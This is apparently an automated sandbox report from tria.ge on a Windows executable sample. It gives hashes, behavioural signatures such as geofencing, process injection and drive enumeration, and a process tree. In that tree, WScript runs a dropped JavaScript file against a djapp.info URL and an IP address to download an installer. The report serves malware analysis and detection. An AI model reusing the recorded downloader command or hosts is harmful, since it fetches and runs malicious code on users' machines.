Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
155s -
max time network
166s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
28/11/2022, 04:38
Static task
static1
Behavioral task
behavioral1
Sample
ad351441a01baea4ecc67b282cb8f81425dc1d4214a0cebba9a08b6010530b9b.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
ad351441a01baea4ecc67b282cb8f81425dc1d4214a0cebba9a08b6010530b9b.exe
Resource
win10v2004-20220812-en
General
-
Target
ad351441a01baea4ecc67b282cb8f81425dc1d4214a0cebba9a08b6010530b9b.exe
-
Size
184KB
-
MD5
10394505b1bb8b3b0961cbf3e399509e
-
SHA1
d7a1f0fa82d3b96d18299213014bb4183bf39600
-
SHA256
ad351441a01baea4ecc67b282cb8f81425dc1d4214a0cebba9a08b6010530b9b
-
SHA512
cb87d18ba37ce6dad0529744655ad7a9d4f56f192649f68174f46881705deaff96c5ec8bf073d8b981e124194f16bc2bfe5496cbd816d396db800001565e9b1c
-
SSDEEP
3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO33:/7BSH8zUB+nGESaaRvoB7FJNndnG
Malware Config
Signatures
-
Blocklisted process makes network request 9 IoCs
flow pid Process 17 4972 WScript.exe 28 4972 WScript.exe 32 4972 WScript.exe 38 4972 WScript.exe 49 4252 WScript.exe 50 4252 WScript.exe 52 2668 WScript.exe 56 2668 WScript.exe 59 2316 WScript.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation ad351441a01baea4ecc67b282cb8f81425dc1d4214a0cebba9a08b6010530b9b.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings ad351441a01baea4ecc67b282cb8f81425dc1d4214a0cebba9a08b6010530b9b.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 49 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 52 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1416 wrote to memory of 4972 1416 ad351441a01baea4ecc67b282cb8f81425dc1d4214a0cebba9a08b6010530b9b.exe 82 PID 1416 wrote to memory of 4972 1416 ad351441a01baea4ecc67b282cb8f81425dc1d4214a0cebba9a08b6010530b9b.exe 82 PID 1416 wrote to memory of 4972 1416 ad351441a01baea4ecc67b282cb8f81425dc1d4214a0cebba9a08b6010530b9b.exe 82 PID 1416 wrote to memory of 4252 1416 ad351441a01baea4ecc67b282cb8f81425dc1d4214a0cebba9a08b6010530b9b.exe 85 PID 1416 wrote to memory of 4252 1416 ad351441a01baea4ecc67b282cb8f81425dc1d4214a0cebba9a08b6010530b9b.exe 85 PID 1416 wrote to memory of 4252 1416 ad351441a01baea4ecc67b282cb8f81425dc1d4214a0cebba9a08b6010530b9b.exe 85 PID 1416 wrote to memory of 2668 1416 ad351441a01baea4ecc67b282cb8f81425dc1d4214a0cebba9a08b6010530b9b.exe 86 PID 1416 wrote to memory of 2668 1416 ad351441a01baea4ecc67b282cb8f81425dc1d4214a0cebba9a08b6010530b9b.exe 86 PID 1416 wrote to memory of 2668 1416 ad351441a01baea4ecc67b282cb8f81425dc1d4214a0cebba9a08b6010530b9b.exe 86 PID 1416 wrote to memory of 2316 1416 ad351441a01baea4ecc67b282cb8f81425dc1d4214a0cebba9a08b6010530b9b.exe 87 PID 1416 wrote to memory of 2316 1416 ad351441a01baea4ecc67b282cb8f81425dc1d4214a0cebba9a08b6010530b9b.exe 87 PID 1416 wrote to memory of 2316 1416 ad351441a01baea4ecc67b282cb8f81425dc1d4214a0cebba9a08b6010530b9b.exe 87
Processes
-
C:\Users\Admin\AppData\Local\Temp\ad351441a01baea4ecc67b282cb8f81425dc1d4214a0cebba9a08b6010530b9b.exe"C:\Users\Admin\AppData\Local\Temp\ad351441a01baea4ecc67b282cb8f81425dc1d4214a0cebba9a08b6010530b9b.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufA57C.js" http://www.djapp.info/?domain=UcqYZOZZsG.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmG C:\Users\Admin\AppData\Local\Temp\fufA57C.exe2⤵
- Blocklisted process makes network request
PID:4972
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufA57C.js" http://www.djapp.info/?domain=UcqYZOZZsG.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmG C:\Users\Admin\AppData\Local\Temp\fufA57C.exe2⤵
- Blocklisted process makes network request
PID:4252
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufA57C.js" http://www.djapp.info/?domain=UcqYZOZZsG.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmG C:\Users\Admin\AppData\Local\Temp\fufA57C.exe2⤵
- Blocklisted process makes network request
PID:2668
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufA57C.js" http://www.djapp.info/?domain=UcqYZOZZsG.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmG C:\Users\Admin\AppData\Local\Temp\fufA57C.exe2⤵
- Blocklisted process makes network request
PID:2316
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53813cab188d1de6f92f8b82c2059991b
SHA14807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA51283b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76